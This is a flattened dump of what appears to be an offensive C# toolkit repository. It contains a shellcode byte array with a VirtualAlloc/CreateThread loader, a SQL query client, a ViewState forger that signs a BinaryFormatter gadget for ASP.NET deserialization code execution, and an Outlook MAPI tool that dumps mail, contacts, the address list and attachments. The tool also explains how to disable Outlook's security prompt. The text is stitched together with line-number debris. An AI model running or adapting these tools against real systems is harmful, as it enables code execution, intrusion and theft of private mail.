0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01, 17 | 
0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48, 18 | 0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0, 19 | 0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c, 20 | 0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0, 21 | 0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04, 22 | 0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59, 23 | 0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48, 24 | 0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00, 25 | 0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f, 26 | 0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff, 27 | 0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb, 28 | 0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c, 29 | 0x63,0x2e,0x65,0x78,0x65,0x00 }; 30 | 31 | UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode64.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE); 32 | Marshal.Copy(shellcode64, 0, (IntPtr)(funcAddr), shellcode64.Length); 33 | IntPtr hThread = IntPtr.Zero; 34 | UInt32 threadId = 0; 35 | IntPtr pinfo = IntPtr.Zero; 36 | hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); 37 | WaitForSingleObject(hThread, 0xFFFFFFFF); 38 | } 39 | private static UInt32 MEM_COMMIT = 0x1000; 40 | private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; 41 | [DllImport("kernel32")] 42 | private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect); 43 | [DllImport("kernel32")] 44 | private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId); 45 | [DllImport("kernel32")] 46 | private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); 47 | 
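//From:https://github.com/FortyNorthSecurity/SqlClient
using System;
using System.Data.SqlClient;
using System.Collections.Generic;
using System.Linq;
using System.Text;

namespace SqlClient
{
    class Program
    {
        /// <summary>
        /// Entry point. Connects to a SQL Server with SQL authentication, runs the statement
        /// given on the command line and prints every column name and value of each row.
        /// </summary>
        /// <param name="args">
        /// args[0] user ID, args[1] password, args[2] server, args[3] database, args[4] query text.
        /// </param>
        static void Main(string[] args)
        {
            if (args.Length != 5)
            {
                Console.WriteLine("[*]ERROR: Please provide the correct number of arguments!");
                Console.WriteLine("[*]Ex: SqlClient.exe ");
                return;
            }
            // NOTE(review): the values are concatenated into the connection string, so a ';'
            // inside any argument introduces additional connection-string keywords.
            // SqlConnectionStringBuilder would treat each value as data only.
            string connString = @"Server=" + args[2] + ";Database=" + args[3] + ";User ID=" + args[0] + ";Password=" + args[1];

            try
            {
                using (SqlConnection conn = new SqlConnection(connString))
                {
                    // the statement to run is taken verbatim from the command line
                    string query = args[4];

                    using (SqlCommand cmd = new SqlCommand(query, conn))
                    {
                        //open connection
                        conn.Open();

                        //execute the SQLCommand; using closes the reader on every path
                        using (SqlDataReader dr = cmd.ExecuteReader())
                        {
                            //check if there are records
                            if (dr.HasRows)
                            {
                                while (dr.Read())
                                {
                                    // for each row: all column names first, then all values
                                    for (int i = 0; i < dr.FieldCount; i++)
                                    {
                                        Console.WriteLine(dr.GetName(i));
                                    }
                                    for (int i = 0; i < dr.FieldCount; i++)
                                    {
                                        Console.WriteLine(dr.GetValue(i));
                                    }
                                }
                            }
                            else
                            {
                                Console.WriteLine("No data found.");
                            }
                        }
                    }
                }
            }
            catch (Exception ex)
            {
                //display error message
                Console.WriteLine("Exception: " + ex.Message);
            }
        }
    }
}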
39 | XamlToViewState.exe Run-Calc.xml 042A94E8 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF 40 | "; 41 | Console.WriteLine(Usage); 42 | } 43 | 44 | static byte[] strToToHexByte(string hexString) 45 | { 46 | if ((hexString.Length % 2) != 0) 47 | hexString += " "; 48 | byte[] returnBytes = new byte[hexString.Length / 2]; 49 | for (int i = 0; i < returnBytes.Length; i++) 50 | returnBytes[i] = Convert.ToByte(hexString.Substring(i * 2, 2), 16); 51 | return returnBytes; 52 | } 53 | static string CreateViewState(byte[] dat,string generator,string key) 54 | { 55 | MemoryStream ms = new MemoryStream(); 56 | ms.WriteByte(0xff); 57 | ms.WriteByte(0x01); 58 | ms.WriteByte(0x32); 59 | uint num = (uint)dat.Length; 60 | while (num >= 0x80) 61 | { 62 | ms.WriteByte((byte)(num | 0x80)); 63 | num = num >> 0x7; 64 | } 65 | ms.WriteByte((byte)num); 66 | ms.Write(dat, 0, dat.Length); 67 | byte[] data = ms.ToArray(); 68 | 69 | byte[] validationKey= strToToHexByte(key); 70 | 71 | uint _clientstateid = 0; 72 | if(!uint.TryParse(generator, NumberStyles.HexNumber, CultureInfo.InvariantCulture, out _clientstateid)) 73 | { 74 | System.Environment.Exit(0); 75 | } 76 | 77 | byte[] _mackey = new byte[4]; 78 | _mackey[0] = (byte)_clientstateid; 79 | _mackey[1] = (byte)(_clientstateid >> 8); 80 | _mackey[2] = (byte)(_clientstateid >> 16); 81 | _mackey[3] = (byte)(_clientstateid >> 24); 82 | 83 | ms = new MemoryStream(); 84 | ms.Write(data,0,data.Length); 85 | ms.Write(_mackey,0,_mackey.Length); 86 | byte[] hash=(new HMACSHA1(validationKey)).ComputeHash(ms.ToArray()); 87 | ms=new MemoryStream(); 88 | ms.Write(data,0,data.Length); 89 | ms.Write(hash,0,hash.Length); 90 | return Convert.ToBase64String(ms.ToArray()); 91 | } 92 | static byte[] Serialize(object obj) 93 | { 94 | using (MemoryStream mem = new MemoryStream()) 95 | { 96 | BinaryFormatter bf = new BinaryFormatter(); 97 | bf.Serialize(mem, obj); 98 | return mem.ToArray(); 99 | } 100 | } 101 | public static void Run(String xaml, String 
generator, String key) 102 | { 103 | string data = CreateViewState(Serialize(new TextFormattingRunPropertiesMarshal(File.ReadAllText(xaml))),generator,key); 104 | Console.WriteLine("__VIEWSTATE="); 105 | Console.WriteLine(data); 106 | } 107 | 108 | static void Main(string[] args) 109 | { 110 | if(args.Length!=3) 111 | { 112 | ShowUsage(); 113 | System.Environment.Exit(0); 114 | } 115 | try 116 | { 117 | Run(args[0], args[1], args[2]); 118 | } 119 | catch (Exception e) 120 | { 121 | Console.WriteLine("{0}", e.Message); 122 | System.Environment.Exit(0); 123 | } 124 | } 125 | } 126 | } 127 | -------------------------------------------------------------------------------- /mapi_tool.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using Microsoft.Office.Interop.Outlook; 3 | 4 | namespace MAPI_TOOL 5 | { 6 | class Program 7 | { 8 | private static void ListMail(Microsoft.Office.Interop.Outlook.NameSpace ns,String folder,String mode) 9 | { 10 | Console.WriteLine("[*] Try to list mail"); 11 | Console.WriteLine("[*] Folder:" + folder); 12 | Console.WriteLine("[*] Mode:" + mode); 13 | Console.WriteLine(); 14 | Microsoft.Office.Interop.Outlook.MAPIFolder mapifolder = null; 15 | if (folder == "Inbox") 16 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderInbox); 17 | else if(folder == "Drafts") 18 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderDrafts); 19 | else if (folder == "SentItems") 20 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderSentMail); 21 | else if (folder == "DeletedItems") 22 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderDeletedItems); 23 | else if (folder == "Outbox") 24 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderOutbox); 25 | else if (folder == "JunkEmail") 26 | mapifolder = 
ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderJunk); 27 | else 28 | { 29 | Console.WriteLine("[!] The folder is not supported yet.\r\n"); 30 | return; 31 | } 32 | Microsoft.Office.Interop.Outlook.Items items = mapifolder.Items; 33 | Console.WriteLine("[+] Folder size:" + mapifolder.Items.Count + "\r\n"); 34 | if (mode == "all") 35 | Console.WriteLine("[!] Notice:When the antivirus software is inactive or out-of-date,it will pop up a Outlook security prompt.\r\n"); 36 | foreach (var item in items) 37 | { 38 | var mail = item as Microsoft.Office.Interop.Outlook.MailItem; 39 | 40 | if (mail != null) 41 | { 42 | if (mail.UnRead == true) 43 | Console.WriteLine("[+] UnRead Mail"); 44 | else 45 | Console.WriteLine("[+] Mail"); 46 | if (mode == "short") 47 | { 48 | Console.WriteLine("Subject:" + mail.Subject); 49 | Console.WriteLine("ReceivedTime:" + mail.ReceivedTime); 50 | if (mail.Attachments.Count > 0) 51 | { 52 | Console.WriteLine("Attachments:" + mail.Attachments.Count); 53 | Microsoft.Office.Interop.Outlook.Attachments attachments = mail.Attachments; 54 | foreach (Microsoft.Office.Interop.Outlook.Attachment att in attachments) 55 | { 56 | Console.WriteLine(" Name:" + att.FileName); 57 | } 58 | } 59 | Console.WriteLine("OutlookVersion:" + mail.OutlookVersion); 60 | Console.WriteLine("EntryID:" + mail.EntryID); 61 | Console.WriteLine(); 62 | continue; 63 | 64 | } 65 | else if(mode == "all") 66 | { 67 | Console.WriteLine("Subject:" + mail.Subject); 68 | Console.WriteLine("From:" + mail.SenderName); 69 | Console.WriteLine("To:" + mail.To); 70 | Console.WriteLine("CC:" + mail.CC); 71 | Console.WriteLine("ReceivedTime:" + mail.ReceivedTime); 72 | if (mail.Attachments.Count > 0) 73 | { 74 | Console.WriteLine("Attachments:" + mail.Attachments.Count); 75 | Microsoft.Office.Interop.Outlook.Attachments attachments = mail.Attachments; 76 | foreach (Microsoft.Office.Interop.Outlook.Attachment att in attachments) 77 | { 78 | Console.WriteLine(" 
Name:" + att.FileName); 79 | } 80 | } 81 | Console.WriteLine("Body:\r\n" + mail.Body); 82 | Console.WriteLine("OutlookVersion:" + mail.OutlookVersion); 83 | Console.WriteLine("EntryID:" + mail.EntryID); 84 | Console.WriteLine(); 85 | } 86 | } 87 | } 88 | } 89 | 90 | private static void ListUnreadMail(Microsoft.Office.Interop.Outlook.NameSpace ns, String folder, String mode) 91 | { 92 | Console.WriteLine("[*] Try to list unread mail"); 93 | Console.WriteLine("[*] Folder:" + folder); 94 | Console.WriteLine("[*] Mode:" + mode); 95 | Console.WriteLine(); 96 | Microsoft.Office.Interop.Outlook.MAPIFolder mapifolder = null; 97 | if (folder == "Inbox") 98 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderInbox); 99 | else if (folder == "Drafts") 100 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderDrafts); 101 | else if (folder == "SentItems") 102 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderSentMail); 103 | else if (folder == "DeletedItems") 104 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderDeletedItems); 105 | else if (folder == "Outbox") 106 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderOutbox); 107 | else if (folder == "JunkEmail") 108 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderJunk); 109 | else 110 | { 111 | Console.WriteLine("[!] The folder is not supported yet.\r\n"); 112 | return; 113 | } 114 | Microsoft.Office.Interop.Outlook.Items items = mapifolder.Items; 115 | Console.WriteLine("[+] Folder size:" + mapifolder.Items.Count + "\r\n"); 116 | 117 | if (mode == "all") 118 | Console.WriteLine("[!] 
Notice:When the antivirus software is inactive or out-of-date,it will pop up a Outlook security prompt.\r\n"); 119 | 120 | foreach (var item in items) 121 | { 122 | var mail = item as Microsoft.Office.Interop.Outlook.MailItem; 123 | 124 | if (mail != null) 125 | { 126 | if (mail.UnRead == false) 127 | continue; 128 | else 129 | Console.WriteLine("[+] UnRead Mail"); 130 | if (mode == "short") 131 | { 132 | Console.WriteLine("Subject:" + mail.Subject); 133 | Console.WriteLine("ReceivedTime:" + mail.ReceivedTime); 134 | if (mail.Attachments.Count > 0) 135 | { 136 | Console.WriteLine("Attachments:" + mail.Attachments.Count); 137 | Microsoft.Office.Interop.Outlook.Attachments attachments = mail.Attachments; 138 | foreach (Microsoft.Office.Interop.Outlook.Attachment att in attachments) 139 | { 140 | Console.WriteLine(" Name:" + att.FileName); 141 | } 142 | } 143 | Console.WriteLine("OutlookVersion:" + mail.OutlookVersion); 144 | Console.WriteLine("EntryID:" + mail.EntryID); 145 | Console.WriteLine(); 146 | continue; 147 | } 148 | else if (mode == "all") 149 | { 150 | Console.WriteLine("Subject:" + mail.Subject); 151 | Console.WriteLine("From:" + mail.SenderName); 152 | Console.WriteLine("To:" + mail.To); 153 | Console.WriteLine("CC:" + mail.CC); 154 | Console.WriteLine("ReceivedTime:" + mail.ReceivedTime); 155 | if (mail.Attachments.Count > 0) 156 | { 157 | Console.WriteLine("Attachments:" + mail.Attachments.Count); 158 | Microsoft.Office.Interop.Outlook.Attachments attachments = mail.Attachments; 159 | foreach (Microsoft.Office.Interop.Outlook.Attachment att in attachments) 160 | { 161 | Console.WriteLine(" Name:" + att.FileName); 162 | } 163 | } 164 | Console.WriteLine("Body:\r\n" + mail.Body); 165 | Console.WriteLine("OutlookVersion:" + mail.OutlookVersion); 166 | Console.WriteLine("EntryID:" + mail.EntryID); 167 | Console.WriteLine(); 168 | } 169 | } 170 | } 171 | } 172 | 173 | private static void SaveAttachment(Microsoft.Office.Interop.Outlook.NameSpace ns, String 
folder, String EntryID) 174 | { 175 | Console.WriteLine("[*] Try to SaveAttachment"); 176 | Console.WriteLine("[*] Folder:" + folder); 177 | Console.WriteLine("[*] EntryID:" + EntryID); 178 | Console.WriteLine(); 179 | 180 | Microsoft.Office.Interop.Outlook.MAPIFolder mapifolder = null; 181 | if (folder == "Inbox") 182 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderInbox); 183 | else if (folder == "Drafts") 184 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderDrafts); 185 | else if (folder == "SentItems") 186 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderSentMail); 187 | else if (folder == "DeletedItems") 188 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderDeletedItems); 189 | else if (folder == "Outbox") 190 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderOutbox); 191 | else if (folder == "JunkEmail") 192 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderJunk); 193 | else 194 | { 195 | Console.WriteLine("[!] The folder is not supported yet.\r\n"); 196 | return; 197 | } 198 | Microsoft.Office.Interop.Outlook.Items items = mapifolder.Items; 199 | Console.WriteLine("[!] 
Notice:When the antivirus software is inactive or out-of-date,it will pop up a Outlook security prompt.\r\n"); 200 | 201 | foreach (var item in items) 202 | { 203 | var mail = item as Microsoft.Office.Interop.Outlook.MailItem; 204 | 205 | if (mail != null) 206 | { 207 | 208 | if (mail.EntryID == EntryID) 209 | { 210 | Console.WriteLine("[+] Catch the mail."); 211 | Console.WriteLine("Subject:" + mail.Subject); 212 | Console.WriteLine("From:" + mail.SenderName); 213 | Console.WriteLine("To:" + mail.To); 214 | Console.WriteLine("CC:" + mail.CC); 215 | Console.WriteLine("ReceivedTime:" + mail.ReceivedTime); 216 | if (mail.Attachments.Count > 0) 217 | { 218 | Console.WriteLine("Attachments:" + mail.Attachments.Count); 219 | Microsoft.Office.Interop.Outlook.Attachments attachments = mail.Attachments; 220 | foreach (Microsoft.Office.Interop.Outlook.Attachment att in attachments) 221 | { 222 | Console.WriteLine(" Name:" + att.FileName); 223 | att.SaveAsFile(System.Environment.CurrentDirectory + "\\" + att.FileName); 224 | } 225 | } 226 | } 227 | } 228 | } 229 | } 230 | 231 | private static void GetConfig(Microsoft.Office.Interop.Outlook.NameSpace ns,String mode) 232 | { 233 | //Reference:https://github.com/n1nj4sec/pupy/blob/unstable/pupy/modules/outlook.py 234 | Console.WriteLine("[*] Try to get config"); 235 | Console.WriteLine(); 236 | Object CurrentProfileName = ns.GetType().InvokeMember("CurrentProfileName",System.Reflection.BindingFlags.GetProperty,null,ns,null); 237 | Console.WriteLine("[*] CurrentProfileName:" + CurrentProfileName.ToString()); 238 | 239 | Object ExchangeMailboxServerName = ns.GetType().InvokeMember("ExchangeMailboxServerName", System.Reflection.BindingFlags.GetProperty, null, ns, null); 240 | Console.WriteLine("[*] ExchangeMailboxServerName:" + ExchangeMailboxServerName.ToString()); 241 | 242 | Object ExchangeMailboxServerVersion = ns.GetType().InvokeMember("ExchangeMailboxServerVersion", System.Reflection.BindingFlags.GetProperty, null, ns, 
null); 243 | Console.WriteLine("[*] ExchangeMailboxServerVersion:" + ExchangeMailboxServerVersion.ToString()); 244 | if(mode =="all") 245 | { 246 | Console.WriteLine("[!] Notice:When the antivirus software is inactive or out-of-date,it will pop up a Outlook security prompt.\r\n"); 247 | Console.WriteLine("[*] Account-DisplayName:" + ns.Accounts[1].DisplayName); 248 | Console.WriteLine("[*] Account-SmtpAddress:" + ns.Accounts[1].SmtpAddress); 249 | Console.WriteLine("[*] Account-AutoDiscoverXml:\r\n" + ns.Accounts[1].AutoDiscoverXml); 250 | Console.WriteLine("[*] Account-AccountType:" + ns.Accounts[1].AccountType); 251 | } 252 | } 253 | 254 | private static void GetGlobalAddress(Microsoft.Office.Interop.Outlook.NameSpace ns) 255 | { 256 | Console.WriteLine("[*] Try to get global address"); 257 | Console.WriteLine(); 258 | Console.WriteLine("[!] Notice:When the antivirus software is inactive or out-of-date,it will pop up a Outlook security prompt.\r\n"); 259 | AddressList aL = ns.GetGlobalAddressList(); 260 | AddressEntries aEs = aL.AddressEntries; 261 | for (int i = 0; i < aEs.Count; i++) 262 | { 263 | Console.WriteLine(aEs[i+1].GetExchangeUser().PrimarySmtpAddress); 264 | } 265 | } 266 | 267 | private static void GetContacts(Microsoft.Office.Interop.Outlook.NameSpace ns) 268 | { 269 | Console.WriteLine("[*] Try to get contacts"); 270 | Console.WriteLine(); 271 | Console.WriteLine("[!] 
Notice:When the antivirus software is inactive or out-of-date,it will pop up a Outlook security prompt.\r\n"); 272 | Microsoft.Office.Interop.Outlook.MAPIFolder mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderContacts); 273 | for (int i= 0;i< mapifolder.Items.Count;i++) 274 | { 275 | ContactItem item = (Microsoft.Office.Interop.Outlook.ContactItem)mapifolder.Items[i+1]; 276 | Console.WriteLine(item.Email1Address); 277 | } 278 | } 279 | 280 | private static void GetAllFolders(Microsoft.Office.Interop.Outlook.NameSpace ns) 281 | { 282 | Console.WriteLine("[*] Try to get the size of all folders"); 283 | Microsoft.Office.Interop.Outlook.MAPIFolder mapifolder = null; 284 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderInbox); 285 | Console.WriteLine("Inbox: " + mapifolder.Items.Count); 286 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderDrafts); 287 | Console.WriteLine("Drafts: " + mapifolder.Items.Count); 288 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderSentMail); 289 | Console.WriteLine("SentItems: " + mapifolder.Items.Count); 290 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderDeletedItems); 291 | Console.WriteLine("DeletedItems: " + mapifolder.Items.Count); 292 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderOutbox); 293 | Console.WriteLine("Outbox: " + mapifolder.Items.Count); 294 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderJunk); 295 | Console.WriteLine("JunkEmail: " + mapifolder.Items.Count); 296 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderCalendar); 297 | Console.WriteLine("Calendar: " + mapifolder.Items.Count); 298 | mapifolder = 
ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderContacts); 299 | Console.WriteLine("Contacts: " + mapifolder.Items.Count); 300 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderJournal); 301 | Console.WriteLine("Journal: " + mapifolder.Items.Count); 302 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderNotes); 303 | Console.WriteLine("Notes: " + mapifolder.Items.Count); 304 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderTasks); 305 | Console.WriteLine("Tasks: " + mapifolder.Items.Count); 306 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderConflicts); 307 | Console.WriteLine("Conflicts: " + mapifolder.Items.Count); 308 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderSyncIssues); 309 | Console.WriteLine("SyncIssues: " + mapifolder.Items.Count); 310 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderLocalFailures); 311 | Console.WriteLine("LocalFailures: " + mapifolder.Items.Count); 312 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderServerFailures); 313 | Console.WriteLine("ServerFailures: " + mapifolder.Items.Count); 314 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderRssFeeds); 315 | Console.WriteLine("RssFeeds: " + mapifolder.Items.Count); 316 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderToDo); 317 | Console.WriteLine("ToDo: " + mapifolder.Items.Count); 318 | mapifolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderSuggestedContacts); 319 | Console.WriteLine("SuggestedContacts: " + mapifolder.Items.Count); 320 | } 321 | 322 | 323 | static void ShowUsage() 324 | { 325 | 326 | string Usage = @" 327 | Use MAPI 
to manage Outlook. 328 | Author:3gstudent 329 | Complie: 330 | C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe mapi_tool.cs /r:Microsoft.Office.Interop.Outlook.dll 331 | or 332 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe mapi_tool.cs /r:Microsoft.Office.Interop.Outlook.dll 333 | 334 | Usage: 335 | mapi_tool.exe GetAllFolders 336 | mapi_tool.exe GetConfig 337 | mapi_tool.exe ListMail 338 | mapi_tool.exe ListUnreadMail 339 | 340 | Ex command: 341 | mapi_tool.exe GetConfigEx 342 | mapi_tool.exe GetContactsEx 343 | mapi_tool.exe GetGlobalAddressEx 344 | mapi_tool.exe ListMailEx 345 | mapi_tool.exe ListUnreadMailEx 346 | mapi_tool.exe SaveAttachment 347 | 348 | :Inbox/Drafts/SentItems/DeletedItems/Outlook/JunkEmail 349 | 350 | Note: 351 | When the antivirus software is inactive or out-of-date,running Ex command will pop up a Outlook security prompt. 352 | You can modify the registry to turn off the Outlook security prompt. 353 | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\x.0\Outlook\Security,DWORD:ObjectModelGuard,2 354 | 355 | "; 356 | Console.WriteLine(Usage); 357 | } 358 | static void Main(string[] args) 359 | { 360 | Microsoft.Office.Interop.Outlook.Application app = new Microsoft.Office.Interop.Outlook.Application(); 361 | Microsoft.Office.Interop.Outlook.NameSpace ns = app.GetNamespace("MAPI"); 362 | 363 | try 364 | { 365 | if (args.Length == 1) 366 | { 367 | if (args[0] == "GetAllFolders") 368 | GetAllFolders(ns); 369 | else if (args[0] == "GetGlobalAddressEx") 370 | GetGlobalAddress(ns); 371 | else if (args[0] == "GetContactsEx") 372 | GetContacts(ns); 373 | else if (args[0] == "GetConfig") 374 | GetConfig(ns, "short"); 375 | else if (args[0] == "GetConfigEx") 376 | GetConfig(ns, "all"); 377 | else 378 | Console.WriteLine("[!] 
Wrong parameter"); 379 | } 380 | else if (args.Length == 2) 381 | { 382 | if (args[0] == "ListMail") 383 | ListMail(ns, args[1], "short"); 384 | else if (args[0] == "ListUnreadMail") 385 | ListUnreadMail(ns, args[1], "short"); 386 | else if (args[0] == "ListMailEx") 387 | ListMail(ns, args[1], "all"); 388 | else if (args[0] == "ListUnreadMailEx") 389 | ListUnreadMail(ns, args[1], "all"); 390 | else 391 | Console.WriteLine("[!] Wrong parameter"); 392 | } 393 | 394 | else if (args.Length == 3) 395 | { 396 | if (args[0] == "SaveAttachment") 397 | SaveAttachment(ns, args[1], args[2]); 398 | else 399 | Console.WriteLine("[!] Wrong parameter"); 400 | } 401 | else 402 | { 403 | ShowUsage(); 404 | } 405 | } 406 | catch(System.Exception ex) 407 | { 408 | Console.WriteLine("[!] Exception:" + ex.Message); 409 | } 410 | } 411 | } 412 | } 413 | --------------------------------------------------------------------------------